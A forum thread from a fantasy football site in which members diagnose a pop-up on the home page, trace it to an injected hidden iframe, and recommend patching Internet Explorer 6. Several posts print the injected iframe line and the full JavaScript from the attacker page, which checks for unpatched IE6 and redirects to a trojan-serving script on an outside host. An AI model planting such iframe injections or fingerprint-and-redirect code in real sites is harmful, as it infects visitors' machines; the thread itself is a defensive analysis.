Anybody else getting that windows pop-up screen when they go to the FBGs home page? Everytime I hit the home page it comes up.Mine comes up for a split second then disappears. Too fast to read or tell what it is. You may have not even noticed.Looks like the box that pops up when you are downloading something.
Fantasy Football - Footballguys Forums
Welcome to Our Forums. Once you've registered and logged in, you're primed to talk football, among other topics, with the sharpest and most experienced fantasy players on the internet.
Windows pop-up screen (1 Viewer)
- Thread starter GoRaiders
- Start date
midtown luchas
Footballguy
I don't get it, but I work in Online Advertising and this sounds like you probably have software installed (you probably didn't even know you did it) that calls up pop-up ads when you are on cartain types of sites (i.e. financial, footaball, etc.). It usually comes bundled when you download something like Gator, Kazaa, etc.Very annoying...
Marino's Legacy
Footballguy
I am also getting the pop-up, and I also ran spyware. Anyone else have any ideas, maybe we can bump this until someone from the site can get a look at it.
BoneYardDog
Footballguy
Yep I get it also, very annoying...Started about 2 days ago...
whitesnake
Footballguy
Getting it too...Anyone know what it is? Annoying and a little spooky with the recent virus attacks against FBG's......
PocketPasser
Maurice
I'm not getting that. But, I did a google.com search on txtprog.exe and found theses:
Link1
Link2
It's some kind of trogan/trogan creator. Whatever you do, don't execute that thing. I highly suggest you do a thorough virus scan/cleaning of your computer.
Link1 is to what appears to be a hacker forum discussing how great these jerks are in creating this stuff.
Link2 is to Pest Patrol which will detect and remove (according to them) this pest. I have Pest Patrol which may be why I'm not getting this.
Link1
Link2
It's some kind of trogan/trogan creator. Whatever you do, don't execute that thing. I highly suggest you do a thorough virus scan/cleaning of your computer.
Link1 is to what appears to be a hacker forum discussing how great these jerks are in creating this stuff.
Link2 is to Pest Patrol which will detect and remove (according to them) this pest. I have Pest Patrol which may be why I'm not getting this.
I'm not getting it either. This is definitely the department of Dodds and/or Maxwell. They'll figure it out as soon as possible.
P Nasty Flow
Footballguy
I am getting the pop up also but only on my work computer. I thought it was a "big brother" thing. hopefully it isn't and I can get back to "work" without worring about someone watching over me!!
3C's
Footballguy
Are any of you guys that were getting it, still getting it? If it's there, this could be a case of php injection (not saying it is, but coud be). Only thing I've found about the .exe is a case of php injection. Might want to update your IE. I have the latest patches, maybe that's why I'm not seeing it.
Sack-Religious
Footballguy
We're looking into it.
Idiot Boxer
Footballguy
Yeah, I'm getting it too...So when you figure it out, let me know.
David Dodds
Administrator
What is weird is I downloaded the front page and that iframe code isn't there. It is being dynamically attached somehow and possibly not from our server. The technical experts from Interland are scanning our entire box and looking into how this can be happening. I pointed them to this thread.Interesting (maybe). If you look at the source for the footballguys.com page this is at the end: <iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>Don't know if anyone there works for Vita Consulting.
Dickie Dunn
Footballguy
I e-mailed David about this yesterday. Been getting it for a couple of days on XP/IE 6.0.Is anyone actually getting the file to download? Fortunately whenever it happens to me I also get an error window that says "Windows cannot access the specified device, path or file. You may not have the appropriate permissions to access the item."No sign of any file on my hard drive anywhere either.
whitesnake
Footballguy
It's still there...Please, I dont understand all this technical jargon....Does anyone know what it is in "puter illiterate" terms.......Running Windows 2000/IE6
PocketPasser
Maurice
A trojan horse to a computer is just what it was for the anciet greeks, a seemingly innocent gift that is in fact dangerous. On a computer, it is a file that looks ok, but when downloaded and executed, it will install other software that creates "backdoors", or sneaky ways for someone else to access and gain control of your computer without you ever knowing it. These are usually used to either set up your computer so it can either be used in a Denial of Service (DOS) attack on other computers, like flooding a server with spam, and/or to capture information like logons, passwords, and even your credit information if you use your credit card to buy stuff over the internet. This information is then sent back to a central server where the hacker that sent you the trojan horse can access it. Not good.I read all of what was posted in that hacker forum, the Link1 I posted above. If I'm reading it correctly, their trojan only works with IE6, and only if it is an unpatched version of IE6. Several of the hackers seemed to be saying it wouldn't work with IE5.0/5.5. Now, I'm using IE5 (home, old work computer) or a patched version of IE6 (new work computer) and I don't get the pop-up so this seems to bear out idea that only unpatched IE6 is vulnerable. I'm not sure about using Netscape (or Mozilla). Hope that's clear for you.
F
FightingWombat
Guest
Looks like you are correct. The exploit only works with unpatched IE6. For those that are experiencing the popup, it looks like a good idea to dl the IE6 patch and install it.Judging from the banter in link 1, it looks as if there is an update of this exploit on the horizon
.
The Z Machine
Footballguy
I checked out that 216.247.117.114/inf.html page that's listed at the end of the FBG.com homepage source. Here's what that page's source is:
<html><script LANGUAGE="javascript"><!--function ereg(tofind,tocheck){ exist=tocheck.indexOf(tofind); if(exist==-1) { return false; } else { return true; }}function FindMaxP(){ Max=0; PList = clientInformation.appMinorVersion; TabSplit=new Array(); PVersTab=new Array(); CharToClear=/\s/g; PList=PList.replace(CharToClear,""); rech=/\;/; TabSplit=PList.split(rech); for(i=0,key=0;i<TabSplit.length;i++) { PString=TabSplit; TempLength=PString.length; FirstChar=PString.substring(0,1); FirstChar=FirstChar.toUpperCase(); if(FirstChar=="Q") { ToKeep=PString.substring(1,TempLength); PVersTab[key]=ToKeep; key++; } } Max=PVersTab[0]; for(i=0;i<PVersTab.length;i++) { ValTemp=PVersTab; if(ValTemp>Max) { Max=ValTemp; } } return Max;}function IsP(){ var ms = navigator.appVersion; PList = clientInformation.appMinorVersion; SP_found = ereg("SP",PList); if(ereg("MSIE 6",ms)) { Max=FindMaxP(); if(SP_found == true || Max>=313675) { } else { window.location.href='http://216.247.117.113/cgi-bin/readme.pl'; } }}//--></SCRIPT><body onload="IsP();"></body></html>Since I'm running Mozilla on Linux, I really don't have a fear of loading up these pages since I doubt they make the trojans for my setup.Also, it's too bad that the whitespace gets fubar'd on this board.
Edit: From the looks of the 216.247.117.113/cgi-bin/readme.pl code that this javascript loads, it appears to be a a troja intended to infect Win32 systems. It's calling some APIs in the Windows System32 directory most likely. I'm no security expert but this looks pretty bad IMO.
Also, the last bit of HTML that generates this popup is on every page of the main FBG site I believe, but it is not on the message boards site. I think you guys rung these of different servers anyway, so that might explain it.
<html><script LANGUAGE="javascript"><!--function ereg(tofind,tocheck){ exist=tocheck.indexOf(tofind); if(exist==-1) { return false; } else { return true; }}function FindMaxP(){ Max=0; PList = clientInformation.appMinorVersion; TabSplit=new Array(); PVersTab=new Array(); CharToClear=/\s/g; PList=PList.replace(CharToClear,""); rech=/\;/; TabSplit=PList.split(rech); for(i=0,key=0;i<TabSplit.length;i++) { PString=TabSplit; TempLength=PString.length; FirstChar=PString.substring(0,1); FirstChar=FirstChar.toUpperCase(); if(FirstChar=="Q") { ToKeep=PString.substring(1,TempLength); PVersTab[key]=ToKeep; key++; } } Max=PVersTab[0]; for(i=0;i<PVersTab.length;i++) { ValTemp=PVersTab; if(ValTemp>Max) { Max=ValTemp; } } return Max;}function IsP(){ var ms = navigator.appVersion; PList = clientInformation.appMinorVersion; SP_found = ereg("SP",PList); if(ereg("MSIE 6",ms)) { Max=FindMaxP(); if(SP_found == true || Max>=313675) { } else { window.location.href='http://216.247.117.113/cgi-bin/readme.pl'; } }}//--></SCRIPT><body onload="IsP();"></body></html>Since I'm running Mozilla on Linux, I really don't have a fear of loading up these pages since I doubt they make the trojans for my setup.Also, it's too bad that the whitespace gets fubar'd on this board.
Edit: From the looks of the 216.247.117.113/cgi-bin/readme.pl code that this javascript loads, it appears to be a a troja intended to infect Win32 systems. It's calling some APIs in the Windows System32 directory most likely. I'm no security expert but this looks pretty bad IMO.
Also, the last bit of HTML that generates this popup is on every page of the main FBG site I believe, but it is not on the message boards site. I think you guys rung these of different servers anyway, so that might explain it.
Last edited by a moderator:
I checked my firewall logs and my firewall seems to be blocking traffic from a remote host with an IP address of 192.168.1.1.The blocked times seem consistant with times that I have connected with FBG's.I am hoping that my firewall is taking care of the problem for my computer
here is information that I found , about the IP address that I found (192.168.1.1 previous message)OrgName: Internet Assigned Numbers Authority OrgID: IANAAddress: 4676 Admiralty Way, Suite 330City: Marina del ReyStateProv: CAPostalCode: 90292-6695Country: USNetRange: 192.168.0.0 - 192.168.255.255 CIDR: 192.168.0.0/16 NetName: IANA-CBLK1NetHandle: NET-192-168-0-0-1Parent: NET-192-0-0-0-0NetType: IANA Special UseNameServer: BLACKHOLE-1.IANA.ORGNameServer: BLACKHOLE-2.IANA.ORGComment: This block is reserved for special purposes.Comment: Please see RFC 1918 for additional information.Comment: RegDate: 1994-03-15Updated: 2002-09-16OrgTechHandle: IANA-ARINOrgTechName: Internet Corporation for Assigned Names and Number OrgTechPhone: +1-310-823-9358OrgTechEmail: res-ip@iana.org# ARIN WHOIS database, last updated 2003-07-29 19:15# Enter ? for additional hints on searching ARIN's WHOIS database.
F
FightingWombat
Guest
192.168.1.1 is often the internal IP used for a router. I have an internet gateway that uses a similar IP (192.168.2.1 methinks). Are you a network by chance?
Last edited:
Here is more (I think) info on IP 192.168.1.107/30/03 11:49:19 IP block 216.247.117.114Trying 216.247.117.114 at ARINTrying 216.247.117 at ARINOrgName: Interland OrgID: INTDAddress: 34 Peachtree St., NWCity: AtlantaStateProv: GAPostalCode: 30303Country: USNetRange: 216.247.0.0 - 216.247.255.255 CIDR: 216.247.0.0/16 NetName: INTERLAND-3NetHandle: NET-216-247-0-0-1Parent: NET-216-0-0-0-0NetType: Direct AllocationNameServer: A.NS.INTERLAND.NETNameServer: B.NS.INTERLAND.NETNameServer: C.NS.INTERLAND.NETComment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLERegDate: 1999-10-21Updated: 2002-03-04TechHandle: BW995-ARINTechName: Wright, Barry TechPhone: +1-404-720-8301TechEmail: asnadmin@interland.com 
Greg R
Footballguy
Just to expand on what's been said for the computer illiterate...
If you are using the latest version of Internet Explorer, which is IE 6 with Service Pack 1, it doesn't affect you. That's what I'm using and I haven't ever seen this problem with the FBG site.
If you're already running IE 6, You can get Service Pack 1 at Microsoft's download page.
Even though FBG's is going to fix the issue, you still want to get this patch because another website you visit could have the same issue and infect you.
If you are using the latest version of Internet Explorer, which is IE 6 with Service Pack 1, it doesn't affect you. That's what I'm using and I haven't ever seen this problem with the FBG site.
If you're already running IE 6, You can get Service Pack 1 at Microsoft's download page.
Even though FBG's is going to fix the issue, you still want to get this patch because another website you visit could have the same issue and infect you.
The Z Machine
Footballguy
Paul, the 192.168.1.1 IP is reserved for internal IPs like those on a LAN, which you probably have set up due to using a router, or maybe you're getting assigned a "private" IP from your corporate router or something. Anyway, the 192.168.1.1 is a red herring. The 192.168.X.X and the 10.0.X.X netblocks are reserved for private use and are not external addresses found on the internet.The next IP you gave is 216.247.117.114, which is part of the Interland netblock which I believe serves the webpages for footballguys.com, but not for the forums here. The 216.247.117.114 is also a red herring in my opinion as I don't think that Interland is inserting the malicious code into the footballguys.com pages as they are their customers and I'm sure FBG pays a pretty penny for all the data they transmit.The people who are hosting the perl script (216.247.117.113) that is doing the Windows API calls however are dotcomsystems.com. Probably some hacker put the script there and they don't even know about it. This is interesting.Here is more (I think) info on IP 192.168.1.107/30/03 11:49:19 IP block 216.247.117.114Trying 216.247.117.114 at ARINTrying 216.247.117 at ARINOrgName: Interland OrgID: INTDAddress: 34 Peachtree St., NWCity: AtlantaStateProv: GAPostalCode: 30303Country: USNetRange: 216.247.0.0 - 216.247.255.255 CIDR: 216.247.0.0/16 NetName: INTERLAND-3NetHandle: NET-216-247-0-0-1Parent: NET-216-0-0-0-0NetType: Direct AllocationNameServer: A.NS.INTERLAND.NETNameServer: B.NS.INTERLAND.NETNameServer: C.NS.INTERLAND.NETComment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLERegDate: 1999-10-21Updated: 2002-03-04TechHandle: BW995-ARINTechName: Wright, Barry TechPhone: +1-404-720-8301TechEmail: asnadmin@interland.com
Greg R
Footballguy
You're welcome... and I should have said, if you don't know what version you are on, click on the Help Menu, then "About Internet Explorer".If you're on IE 6 it should say at the top version 6.0 with some other numbers after it.2 or 3 lines below that it should say:
If you have that, then you have Service Pack 1 installed already.
Jason Wood
Zoo York
Thank you so much GregR, I was getting the window popups at work and this has solved the problem.Cheers
F
FightingWombat
Guest
According to the information in link 1, the only version the exploit works with is IE 6.0 - unpatched. It doesn't work with 5.0, 5.5 or 6.0-SP1.
Mystery Achiever
Footballguy
thx from me, too, gregr; i just downloaded sp1 and so far the pop-up seems to be gone.
